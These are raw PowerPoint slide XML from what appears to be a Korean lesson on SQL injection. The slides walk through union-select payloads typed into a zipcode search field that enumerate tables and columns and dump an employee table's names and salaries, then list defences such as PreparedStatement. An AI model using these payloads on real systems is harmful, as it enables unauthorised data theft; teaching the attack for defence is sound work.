              <a:t> dept,0,0,0,0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> emp,0,0,0,0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test_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ,0, 0, 0, 0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DC6A3B1-687B-C1F5-E0F5-2E7AE427E87D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863600" y="444500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동이름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8E5CFA0-261E-1136-5213-4FDA80767E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555750" y="4489450"/>
            <a:ext cx="1485900" cy="232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37483ED-CF54-3C0D-45FD-F929D5A17DAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093819" y="4489450"/>
            <a:ext cx="551081" cy="232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49304A4F-6F94-8228-E7E3-55F7C6AF3C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2076450" y="4489450"/>
            <a:ext cx="2260600" cy="10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387E3EF-AB12-CFC7-0760-80C700445EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375150" y="4349750"/>
            <a:ext cx="507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aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘ union select tname,’0’,’0’,’0’,’0’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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tab --</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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xmlns="" id="{CEC20A3E-C550-97C8-CE65-4C031746B734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2044227" y="2025650"/>
            <a:ext cx="2388073" cy="2533650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2388073 w 2388073"/>
              <a:gd name="connsiteY0" fmla="*/ 2413000 h 2533650"/>
              <a:gd name="connsiteX1" fmla="*/ 2095973 w 2388073"/>
              <a:gd name="connsiteY1" fmla="*/ 2197100 h 2533650"/>
              <a:gd name="connsiteX2" fmla="*/ 1962623 w 2388073"/>
              <a:gd name="connsiteY2" fmla="*/ 2184400 h 2533650"/>
              <a:gd name="connsiteX3" fmla="*/ 1327623 w 2388073"/>
              <a:gd name="connsiteY3" fmla="*/ 2228850 h 2533650"/>
              <a:gd name="connsiteX4" fmla="*/ 1099023 w 2388073"/>
              <a:gd name="connsiteY4" fmla="*/ 2330450 h 2533650"/>
              <a:gd name="connsiteX5" fmla="*/ 781523 w 2388073"/>
              <a:gd name="connsiteY5" fmla="*/ 2463800 h 2533650"/>
              <a:gd name="connsiteX6" fmla="*/ 508473 w 2388073"/>
              <a:gd name="connsiteY6" fmla="*/ 2527300 h 2533650"/>
              <a:gd name="connsiteX7" fmla="*/ 317973 w 2388073"/>
              <a:gd name="connsiteY7" fmla="*/ 2533650 h 2533650"/>
              <a:gd name="connsiteX8" fmla="*/ 190973 w 2388073"/>
              <a:gd name="connsiteY8" fmla="*/ 2520950 h 2533650"/>
              <a:gd name="connsiteX9" fmla="*/ 146523 w 2388073"/>
              <a:gd name="connsiteY9" fmla="*/ 2470150 h 2533650"/>
              <a:gd name="connsiteX10" fmla="*/ 32223 w 2388073"/>
              <a:gd name="connsiteY10" fmla="*/ 2273300 h 2533650"/>
              <a:gd name="connsiteX11" fmla="*/ 6823 w 2388073"/>
              <a:gd name="connsiteY11" fmla="*/ 2127250 h 2533650"/>
              <a:gd name="connsiteX12" fmla="*/ 19523 w 2388073"/>
              <a:gd name="connsiteY12" fmla="*/ 1606550 h 2533650"/>
              <a:gd name="connsiteX13" fmla="*/ 241773 w 2388073"/>
              <a:gd name="connsiteY13" fmla="*/ 1085850 h 2533650"/>
              <a:gd name="connsiteX14" fmla="*/ 356073 w 2388073"/>
              <a:gd name="connsiteY14" fmla="*/ 831850 h 2533650"/>
              <a:gd name="connsiteX15" fmla="*/ 419573 w 2388073"/>
              <a:gd name="connsiteY15" fmla="*/ 698500 h 2533650"/>
              <a:gd name="connsiteX16" fmla="*/ 533873 w 2388073"/>
              <a:gd name="connsiteY16" fmla="*/ 488950 h 2533650"/>
              <a:gd name="connsiteX17" fmla="*/ 641823 w 2388073"/>
              <a:gd name="connsiteY17" fmla="*/ 228600 h 2533650"/>
              <a:gd name="connsiteX18" fmla="*/ 654523 w 2388073"/>
              <a:gd name="connsiteY18" fmla="*/ 171450 h 2533650"/>
              <a:gd name="connsiteX19" fmla="*/ 679923 w 2388073"/>
              <a:gd name="connsiteY19" fmla="*/ 114300 h 2533650"/>
              <a:gd name="connsiteX20" fmla="*/ 711673 w 2388073"/>
              <a:gd name="connsiteY20" fmla="*/ 31750 h 2533650"/>
              <a:gd name="connsiteX21" fmla="*/ 724373 w 2388073"/>
              <a:gd name="connsiteY21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388073" h="2533650">
                <a:moveTo>
                  <a:pt x="2388073" y="2413000"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2324888" y="2286630"/>
                  <a:pt x="2346977" y="2314758"/>
                  <a:pt x="2095973" y="2197100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2055543" y="2178149"/>
                  <a:pt x="2007073" y="2188633"/>
                  <a:pt x="1962623" y="2184400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1750956" y="2199217"/>
                  <a:pt x="1538510" y="2205418"/>
                  <a:pt x="1327623" y="2228850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1255125" y="2236905"/>
                  <a:pt x="1160177" y="2302975"/>
                  <a:pt x="1099023" y="2330450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="994316" y="2377492"/>
                  <a:pt x="891471" y="2430816"/>
                  <a:pt x="781523" y="2463800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="672805" y="2496415"/>
                  <a:pt x="624710" y="2516334"/>
                  <a:pt x="508473" y="2527300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="445219" y="2533267"/>
                  <a:pt x="381473" y="2531533"/>
                  <a:pt x="317973" y="2533650"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="275640" y="2529417"/>
                  <a:pt x="230869" y="2535726"/>
                  <a:pt x="190973" y="2520950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169873" y="2513135"/>
                  <a:pt x="159529" y="2488511"/>
                  <a:pt x="146523" y="2470150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97505" y="2400948"/>
                  <a:pt x="71586" y="2347106"/>
                  <a:pt x="32223" y="2273300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23756" y="2224617"/>
                  <a:pt x="13107" y="2176263"/>
                  <a:pt x="6823" y="2127250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-11310" y="1985810"/>
                  <a:pt x="11543" y="1648530"/>
                  <a:pt x="19523" y="1606550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73785" y="1321085"/>
                  <a:pt x="136544" y="1299496"/>
                  <a:pt x="241773" y="1085850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="282796" y="1002560"/>
                  <a:pt x="317341" y="916230"/>
                  <a:pt x="356073" y="831850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="376611" y="787106"/>
                  <a:pt x="398036" y="742772"/>
                  <a:pt x="419573" y="698500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="613455" y="299964"/>
                  <a:pt x="314004" y="915755"/>
                  <a:pt x="533873" y="488950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="552954" y="451910"/>
                  <a:pt x="638927" y="241633"/>
                  <a:pt x="641823" y="228600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="646056" y="209550"/>
                  <a:pt x="648352" y="189963"/>
                  <a:pt x="654523" y="171450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="661115" y="151673"/>
                  <a:pt x="672030" y="133595"/>
                  <a:pt x="679923" y="114300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="691086" y="87013"/>
                  <a:pt x="698488" y="58119"/>
                  <a:pt x="711673" y="31750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="725320" y="4457"/>
                  <a:pt x="724373" y="15816"/>
                  <a:pt x="724373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3439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F8B00BA-8047-0CD7-CE8B-CBAEC51331E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596900" y="608231"/>
            <a:ext cx="12366142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생성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>쿼리문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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>상도동</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>%’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>0.DD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>지식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테이블명을 검색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DD : tab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테이블에 존재하는 컬럼 정보 얻는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DD : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>user_tab_cols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정보가 있을 만한 테이블의 컬럼 정보를 얻기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>‘ union select column_name,’0’,’0’,’0’,’0’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>user_tab_cols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>=’emp’ --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> %’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 되어 실행되면 테이블의 컬럼명이 검색된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>탈취할 컬럼명을 얻기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> emno,0,0,0,0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ename,0,0,0,0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sal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ,0, 0, 0, 0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8B2CAC1-C29E-67D9-55D2-100F30D93436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863600" y="373380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동이름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5E7AE9E-B5DC-8861-31BA-108E8C5A21C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555750" y="3778250"/>
            <a:ext cx="1485900" cy="232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B59954-7349-2C2D-F098-D12BDF2D449F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093819" y="3778250"/>
            <a:ext cx="551081" cy="232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D1021419-910F-0DE7-312E-69D076ABBF90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2597150" y="3822700"/>
            <a:ext cx="1822450" cy="10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B6B2ABE-F0FD-81E4-3565-28A85ECF193B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4546600" y="3670300"/>
            <a:ext cx="10637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aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’ union select column_name,’0’,’0’,’0’,’0’ from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>user_tab_cols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>탈취할 테이블명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘--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2835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8E4B77-6051-6E0F-76A4-7F42B83BFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="266700"/>
            <a:ext cx="375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정보 탈취할 테이블에서 검색수행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4DBF585-BB77-F8A4-EB37-A71809FC0640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596900" y="608231"/>
            <a:ext cx="8962710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생성된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>쿼리문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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>상도동</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>%’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>0.DD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>지식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테이블명을 검색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DD : tab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테이블에 존재하는 컬럼 정보 얻는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DD : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>user_tab_cols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정보가 있을 만한 테이블의 컬럼 정보를 얻기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>zipcode,sido,gugun,dong,bunji</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p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 err="1"/>
              <a:t>zipcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where dong like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>‘ union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>empno,ename,sal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>||’0’,’0’,’0’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>emp --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> %’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 되어 실행되면 탈취할 테이블의 레코드가 검색된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정보탈취</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  1111,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>스캇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,3000,0,0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1112,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>윤상준</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,3200,0,0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1113,’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>김사원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’,2220, 0, 0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22A6A87-F035-631D-70F5-B7C8F499A020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863600" y="373380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동이름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E7B70C5-F8FD-463A-F76D-2B2D6B81B92A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555750" y="3778250"/>
            <a:ext cx="1485900" cy="232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5F0AE6B-7968-6F10-4313-A40EB2E39FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093819" y="3778250"/>
            <a:ext cx="551081" cy="232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1AF7A38A-8DB1-F60B-2973-0B5D85D8D015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2508250" y="3778250"/>
            <a:ext cx="1930400" cy="14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DD141D8-FBE3-CEE0-F4C9-1DAA4EF8C1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4483100" y="3733800"/>
            <a:ext cx="621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aaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’ union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>empno,ename,sal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>||’0’,’0’,’0’ from emp --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0738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6A3D63F-8AB5-E26E-7439-CBCE6941B892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260350" y="311150"/>
            <a:ext cx="881715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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>SQLInjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방어코드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>입력되는 데이터가 쿼리문을 가지지 않도록 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>. ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>replaceAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>찾을 문자열</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>“,”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>치환할문자열</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를 사용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3B8B3D8B-3C00-0C9F-4DD5-4FBB6130944A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2781300"/>
            <a:ext cx="2406650" cy="1866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연산</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>제어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>화면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입출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
